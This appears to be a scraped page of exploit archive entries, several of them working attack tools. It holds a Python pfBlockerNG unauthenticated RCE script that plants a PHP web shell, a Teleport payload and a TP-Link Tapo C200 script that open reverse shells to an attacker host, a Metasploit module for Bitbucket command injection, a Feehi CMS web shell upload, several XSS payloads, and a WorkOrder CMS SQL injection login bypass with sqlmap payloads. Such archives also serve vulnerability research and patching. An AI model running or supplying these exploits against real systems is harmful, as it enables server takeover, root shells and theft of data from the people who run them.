<pre><code>#!/usr/bin/env python3<br /># Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/<br /> <br />import argparse<br />import requests<br />import time<br />import sys<br />import urllib.parse<br />from requests.packages.urllib3.exceptions import InsecureRequestWarning<br /> <br />requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br /> <br />parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")<br />parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/")<br />args = parser.parse_args()<br /> <br />url = args.url<br />shell_filename = "system_advanced_control.php"<br /> <br />def check_endpoint(url):<br /> response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)<br /> if response.status_code == 200:<br /> print("[+] pfBlockerNG is installed")<br /> else:<br /> print("\n[-] pfBlockerNG not installed")<br /> sys.exit()<br /> <br />def upload_shell(url, shell_filename):<br /> payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}<br /> print("[/] Uploading shell...")<br /> response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)<br /> time.sleep(2)<br /> response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)<br /> if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):<br /> print("[+] Upload succeeded")<br /> else:<br /> print("\n[-] Error uploading shell. Probably patched ", response.content)<br /> sys.exit()<br /> <br />def interactive_shell(url, shell_filename, cmd):<br /> response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)<br /> print(str(response.text)+"\n")<br /> <br /> <br />def delete_shell(url, shell_filename):<br /> delcmd = "rm /usr/local/www/system_advanced_control.php"<br /> response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)<br /> print("\n[+] Shell deleted")<br /> <br />check_endpoint(url)<br />upload_shell(url, shell_filename)<br />try:<br /> while True:<br /> cmd = input("# ")<br /> interactive_shell(url, shell_filename, cmd)<br />except:<br /> delete_shell(url, shell_filename)<br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)<br /># Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/<br /># Date: 2022-08-24<br /># Exploit Author: UnD3sc0n0c1d0<br /># Vendor Homepage: https://profiles.wordpress.org/3dady/<br /># Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip<br /># Category: Web Application<br /># Version: 1.0<br /># Tested on: Debian / WordPress 6.0.1<br /># CVE : N/A<br /><br /># 1. Technical Description:<br />The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text <br />and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of <br />JavaScript code that can exploit the vulnerability.<br /> <br /># 2. Proof of Concept (PoC):<br /> a. Install and activate version 1.0 of the plugin.<br /> b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady).<br /> c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text):<br /> " autofocus onfocus=alert(/XSS/)><br /> d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed.<br /><br /> Note: This change will be permanent until you modify the edited fields.<br /><br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)<br /># Google Dork: inurl:/wp-content/plugins/wp-useronline/<br /># Date: 2022-08-24<br /># Exploit Author: UnD3sc0n0c1d0<br /># Vendor Homepage: https://github.com/lesterchan/wp-useronline<br /># Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip<br /># Category: Web Application<br /># Version: 2.88.0<br /># Tested on: Debian / WordPress 6.0.1<br /># CVE : CVE-2022-2941<br /># Reference: https://github.com/lesterchan/wp-useronline/commit/59c76b20e4e27489f93dee4ef1254d6204e08b3c<br /><br /># 1. Technical Description:<br />The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions <br />up to, and including 2.88.0. This is due to the fact that all fields in the “Naming Conventions” section do <br />not properly sanitize user input, nor escape it on output. This makes it possible for authenticated attackers, <br />with administrative privileges, to inject JavaScript code into the setting that will execute whenever a user <br />accesses the injected page.<br /> <br /># 2. Proof of Concept (PoC):<br /> a. Install and activate version 2.88.0 of the plugin.<br /> b. Go to the plugin options panel (http://[TARGET]/wp-admin/options-general.php?page=useronline-settings).<br /> c. Identify the "Naming Conventions" section and type your payload in any of the existing fields. You can use <br /> the following payload:<br /> <script>alert(/XSS/)</script><br /> d. Save the changes and now go to the Dashboard/WP-UserOnline option. As soon as you click here, your payload <br /> will be executed.<br /><br />Note: This change will be permanent until you modify the edited fields.<br /><br /></code></pre>
<pre><code># Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)<br /># Date: 08/01/2022<br /># Exploit Author: Brandon Roach & Brian Landrum<br /># Vendor Homepage: https://goteleport.com<br /># Software Link: https://github.com/gravitational/teleport<br /># Version: < 10.1.2<br /># Tested on: Linux<br /># CVE: CVE-2022-36633<br /><br />Proof of Concept (payload):<br />https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=<br />f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=<br />0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=<br />method=3Diam<br /><br /><br />Decoded payload:<br />"<br />/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #<br /><br /></code></pre>
<pre><code># Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 22-08-2022<br /># Exploit Author: yuyudhn<br /># Vendor Homepage: https://feehi.com/<br /># Software Link: https://github.com/liufee/cms<br /># Version: 2.1.1 (REQUIRED)<br /># Tested on: Linux, Docker<br /># CVE : CVE-2022-34140<br /><br /><br /><br /># Proof of Concept:<br />1. Login using admin account at http://feehi-cms.local/admin<br />2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex<br />3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate<br />4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.<br />5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php<br /><br /># Burp request example:<br /><br />POST /admin/index.php?r=ad%2Fcreate HTTP/1.1<br />Host: feehi-cms.local<br />Content-Length: 1530<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://feehi-cms.local<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D<br /><br />Connection: close<br /><br /><br /><br />------WebKitFormBoundaryFBYJ8wfp9LBoF4xg<br /><br />Content-Disposition: form-data; name="_csrf_backend"<br /><br /><br /><br />FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==<br /><br />------WebKitFormBoundaryFBYJ8wfp9LBoF4xg<br /><br />Content-Disposition: form-data; name="AdForm[name]"<br /><br /><br /><br />rce<br /><br />------WebKitFormBoundaryFBYJ8wfp9LBoF4xg<br /><br />Content-Disposition: form-data; name="AdForm[tips]"<br /><br /><br /><br />rce at Ad management<br /><br />------WebKitFormBoundaryFBYJ8wfp9LBoF4xg<br /><br />Content-Disposition: form-data; name="AdForm[input_type]"<br /><br /><br /><br />1<br /><br />------WebKitFormBoundaryFBYJ8wfp9LBoF4xg<br /><br />Content-Disposition: form-data; name="AdForm[ad]"<br /><br /><br /><br /><br /><br />------WebKitFormBoundaryFBYJ8wfp9LBoF4xg<br /><br />Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"<br /><br />Content-Type: image/png<br /><br /><br /><br /><?php phpinfo();<br /><br /><br /><br />------WebKitFormBoundaryFBYJ8wfp9LBoF4xg<br /><br />Content-Disposition: form-data; name="AdForm[link]"<br /><br /><br /><br /><br /><br />--------------<br /> <br /></code></pre>
<pre><code># Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)<br /># Date: 28/08/2022<br /># Exploit Author: Ashkan Moghaddas<br /># Vendor Homepage: https://testa.cc<br /># Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip<br /># Version: 3.5.1<br /># Tested on: Windows/Linux<br /><br /># Proof of Concept:<br /># 1- Install Testa 3.5.1<br /># 2- Go to https://localhost.com/login.php?redirect=XXXX<br /># 3- Add payload to the Tab, the XSS Payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E<br /># 4- XSS has been triggered.<br /><br /># Go to this url "<br />https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E<br />"<br />XSS will trigger.<br /></code></pre>
<pre><code># Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)<br /># Date: 02/11/2022<br /># Exploit Author: hacefresko<br /># Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/<br /># Version: 1.1.15 and below<br /># Tested on: 1.1.11, 1.1.14 and 1.1.15<br /># CVE : CVE-2021-4045<br /><br /># Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce<br /><br />import requests, urllib3, sys, threading, os<br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br />PORT = 1337<br />REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'<br />NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)<br /><br />if len(sys.argv) < 3:<br /> print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")<br /> exit()<br /><br />victim = sys.argv[1]<br />attacker = sys.argv[2]<br /><br />print("[+] Listening on %d" % PORT)<br />t = threading.Thread(target=os.system, args=(NC_COMMAND,))<br />t.start()<br /><br />print("[+] Serving payload to %s\n" % victim)<br />url = "https://" + victim + ":443/"<br />json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}<br />requests.post(url, json=json, verify=False)<br /> <br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Bitbucket Git Command Injection',<br /> 'Description' => %q{<br /> Various versions of Bitbucket Server and Data Center are vulnerable to<br /> an unauthenticated command injection vulnerability in multiple API endpoints.<br /><br /> The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint<br /> creates an archive of the repository, leveraging the `git-archive` command to do so.<br /> Supplying NULL bytes to the request enables the passing of additional arguments to the<br /> command, ultimately enabling execution of arbitrary commands.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'TheGrandPew', # discovery<br /> 'Ron Bowes', # analysis and PoC<br /> 'Jang', # testanull - PoC<br /> 'Shelby Pace' # Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],<br /> [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],<br /> [ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ],<br /> [ 'CVE', '2022-36804' ]<br /> ],<br /> 'Platform' => [ 'linux' ],<br /> 'Privileged' => false,<br /> 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Type' => :linux_dropper,<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'CmdStagerFlavor' => %w[wget curl bourne],<br /> 'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }<br /> }<br /> ],<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Type' => :unix_cmd,<br /> 'Arch' => ARCH_CMD,<br /> 'Payload' => { 'BadChars' => %(:/?#[]@) },<br /> 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }<br /> }<br /> ]<br /> ],<br /> 'DisclosureDate' => '2022-08-24',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'Reliability' => [ IOC_IN_LOGS ],<br /> 'SideEffects' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(7990),<br /> OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']),<br /> OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]),<br /> OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'keep_cookies' => true,<br /> 'uri' => normalize_uri(target_uri.path, 'login')<br /> )<br /><br /> return CheckCode::Unknown('Failed to receive response from application') unless res<br /><br /> unless res.body.include?('Bitbucket')<br /> return CheckCode::Safe('Target does not appear to be Bitbucket')<br /> end<br /><br /> footer = res.get_html_document&.at('footer')<br /> return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer<br /><br /> version_str = footer.at('span')&.children&.text<br /> return CheckCode::Detected('Cannot find version string in footer') unless version_str<br /><br /> matches = version_str.match(/v(\d+\.\d+\.\d+)/)<br /> return CheckCode::Detected('Version unknown') unless matches && matches.length > 1<br /><br /> version_str = matches[1]<br /> vprint_status("Found Bitbucket version: #{matches[1]}")<br /><br /> num_vers = Rex::Version.new(version_str)<br /> return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')<br /><br /> major, minor, revision = version_str.split('.')<br /> case major<br /> when '6'<br /> return CheckCode::Appears<br /> when '7'<br /> case minor<br /> when '6'<br /> return CheckCode::Appears if revision.to_i < 17<br /> when '17'<br /> return CheckCode::Appears if revision.to_i < 10<br /> when '21'<br /> return CheckCode::Appears if revision.to_i < 4<br /> end<br /> when '8'<br /> case minor<br /> when '0', '1'<br /> return CheckCode::Appears if revision.to_i < 3<br /> when '2'<br /> return CheckCode::Appears if revision.to_i < 2<br /> when '3'<br /> return CheckCode::Appears if revision.to_i < 1<br /> end<br /> end<br /><br /> CheckCode::Detected<br /> end<br /><br /> def username<br /> datastore['USERNAME']<br /> end<br /><br /> def password<br /> datastore['PASSWORD']<br /> end<br /><br /> def authenticate<br /> print_status("Attempting to authenticate with user '#{username}' and password '#{password}'")<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'login'),<br /> 'keep_cookies' => true<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login')<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),<br /> 'keep_cookies' => true,<br /> 'vars_post' =><br /> {<br /> 'j_username' => username,<br /> 'j_password' => password,<br /> 'submit' => 'Log in'<br /> }<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'dashboard'),<br /> 'keep_cookies' => true<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res<br /><br /> unless res.body.include?('Your work') && res.body.include?('Projects')<br /> fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid')<br /> end<br /><br /> @authenticated = true<br /> print_good('Successfully logged into Bitbucket!')<br /> end<br /><br /> def find_public_repo<br /> print_status('Searching Bitbucket for publicly accessible repository')<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),<br /> 'keep_cookies' => true<br /> )<br /><br /> fail_with(Failure::Disconnected, 'Did not receive a response') unless res<br /> json_data = JSON.parse(res.body)<br /> fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data<br /><br /> unless json_data['size'] > 0<br /> fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')<br /> end<br /><br /> # opt for public repos unless none exist.<br /> # Attempt to use a private repo if so<br /> repos = json_data['values']<br /> possible_repos = repos.select { |repo| repo['public'] == true }<br /> if possible_repos.empty? && @authenticated<br /> possible_repos = repos.select { |repo| repo['public'] == false }<br /> end<br /><br /> fail_with(Failure::NotFound, 'There doesn\'t appear to be any repos to use') if possible_repos.empty?<br /> possible_repos.each do |repo|<br /> project = repo['project']<br /> next unless project<br /><br /> @project = project['key']<br /> @repo = repo['slug']<br /> break if @project && @repo<br /> end<br /><br /> fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo<br /> print_good("Found public repo '#{@repo}' in project '#{@project}'!")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive')<br /> send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => uri,<br /> 'keep_cookies' => true,<br /> 'vars_get' =><br /> {<br /> 'format' => 'zip',<br /> 'path' => Rex::Text.rand_text_alpha(2..5),<br /> 'prefix' => "#{Rex::Text.rand_text_alpha(1..3)}\x00--exec=`#{cmd}`\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}"<br /> }<br /> )<br /> end<br /><br /> def exploit<br /> @authenticated = false<br /> authenticate unless username.blank? && password.blank?<br /> find_public_repo<br /><br /> if target['Type'] == :linux_dropper<br /> execute_cmdstager(linemax: 6000)<br /> else<br /> execute_command(payload.encoded)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: WorkOrder CMS 0.1.0 Cross-Site Scripting (XSS)<br /><br /># Date: Sep 22, 2022<br /><br /># Exploit Author: Chokri Hammedi<br /><br /># Vendor Homepage: https://github.com/romzes13/WorkOrderCMS<br /><br /># Software Link:<br />https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip<br /><br /># Version: 0.1.0<br /><br /># Tested on: Linux<br /><br /><br /><br /><br /><br /># Payload:<br /><br /><br />username:<u>test1337<script>alert('hi');</script><br /><br />password:<u>test1337<script>alert('hi');</script><br /></code></pre>
<pre><code># Exploit Title: WorkOrder CMS 0.1.0 SQLI<br /><br /># Date: Sep 22, 2022<br /><br /># Exploit Author: Chokri Hammedi<br /><br /># Vendor Homepage: https://github.com/romzes13/WorkOrderCMS<br /><br /># Software Link:<br />https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip<br /><br /># Version: 0.1.0<br /><br /># Tested on: Linux<br /><br /><br /><br /><br /><br /># Auth Bypass:<br /><br /><br />username:' or '1'='1<br /><br />password:' or '1'='1<br /><br /><br />#sqlmap -r workorder.req --threads=10 --level 5 --risk 3 --dbs --dbms=mysql<br /><br /><br /># POST Requests:<br /><br /><br />Parameter: #1* ((custom) POST)<br /><br /> Type: error-based<br /><br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (FLOOR)<br /><br /> Payload: userName=1'='1&password=1/' AND (SELECT 3761 FROM(SELECT<br />COUNT(*),CONCAT(0x7170627071,(SELECT<br />(ELT(3761=3761,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UUhY!1111'/<br /><br /><br /> Type: stacked queries<br /><br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /><br /> Payload: userName=1'='1&password=1/';SELECT SLEEP(5)#!1111'/<br /><br /><br /> Type: time-based blind<br /><br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /><br /> Payload: userName=1'='1&password=1/' AND (SELECT 6822 FROM<br />(SELECT(SLEEP(5)))lYsh)-- YlDI!1111'/<br /><br /><br />Parameter: #2* ((custom) POST)<br /><br /> Type: error-based<br /><br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (FLOOR)<br /><br /> Payload: userName=1'='1&password=1/!1111' AND (SELECT 2010 FROM(SELECT<br />COUNT(*),CONCAT(0x7170627071,(SELECT<br />(ELT(2010=2010,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tqtn/<br /><br /><br /> Type: stacked queries<br /><br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /><br /> Payload: userName=1'='1&password=1/!1111';SELECT SLEEP(5)#/<br /><br /><br /> Type: time-based blind<br /><br /> Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)<br /><br /> Payload: userName=1'='1&password=1/!1111' OR SLEEP(5)-- XuTW/<br /></code></pre>